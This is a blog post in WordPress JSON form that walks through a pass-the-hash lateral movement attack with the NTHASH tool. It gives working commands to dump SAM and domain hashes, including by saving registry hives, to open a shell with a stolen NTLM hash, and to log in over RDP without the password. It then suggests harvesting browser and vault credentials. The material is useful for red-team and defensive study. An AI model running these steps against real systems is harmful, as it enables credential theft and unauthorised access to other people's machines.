{"id":2168,"date":"2019-10-28T21:29:23","date_gmt":"2019-10-28T20:29:23","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2168"},"modified":"2019-10-31T19:16:41","modified_gmt":"2019-10-31T18:16:41","slug":"demonstrating-pth-lateral-movement-with-nthash","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2168","title":{"rendered":"Demonstrating lateral movement with NTHASH part #1"},"content":{"rendered":"

Following previous article on NTHASH<\/a>, lets see how to perform lateral movement using \u00ab\u00a0pass the hash\u00a0\u00bb (pth).<\/p>\n

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).<\/p>\n

1.Retrieve the hash
\nNTHASH-win64.exe \/dumpsam
\nor
\nNTHASH-win64.exe \/dumphashes \/system<\/strong>
\nor
\nreg save hklm\\sam sam.sav and reg save hklm\\system system.sav
\nNTHASH-win64.exe \/dumphashes \/offline
\nor (in a domain env)
\nNTHASH-win64.exe \/logonpasswords<\/p>\n

2.Pass the hash
\nNTHASH-win64.exe \/pth \/user:username \/password:8846F7EAEE8FB117AD06BDD830B7586C \/domain:.<\/strong><\/p>\n

3.In the newly opened cmd \u00ab\u00a0pth\u00a0\u00bb shell, type\u00a0mstsc \/restrictedadmin \/v:target<\/strong><\/p>\n

You will end up logged as the \u00ab\u00a0username\u00a0\u00bb account in a RDP console on server named \u00ab\u00a0target\u00a0\u00bb.<\/p>\n

Try a simple whoami for fun and go back to credential harvesting for this account using \/firefox, \/chrome, \/enumvault, \/enumcred, etc.<\/p>\n

And you never had to enter the \u00ab\u00a0username\u00a0\u00bb password…<\/p>\n

Note that\u00a0any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist\/taskkill, wmic, net, winrm\/powershell, psexec, etc)<\/p>\n

This will be covered in future articles.<\/p>\n","protected":false},"excerpt":{"rendered":"

Following previous article on NTHASH, lets see how to perform lateral movement using \u00ab\u00a0pass the hash\u00a0\u00bb (pth). In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client). 1.Retrieve the hash NTHASH-win64.exe \/dumpsam or NTHASH-win64.exe \/dumphashes \/system or reg save hklm\\sam sam.sav and reg save hklm\\system system.sav NTHASH-win64.exe \/dumphashes […]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2168","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2168"}],"version-history":[{"count":11,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2168\/revisions"}],"predecessor-version":[{"id":2221,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2168\/revisions\/2221"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}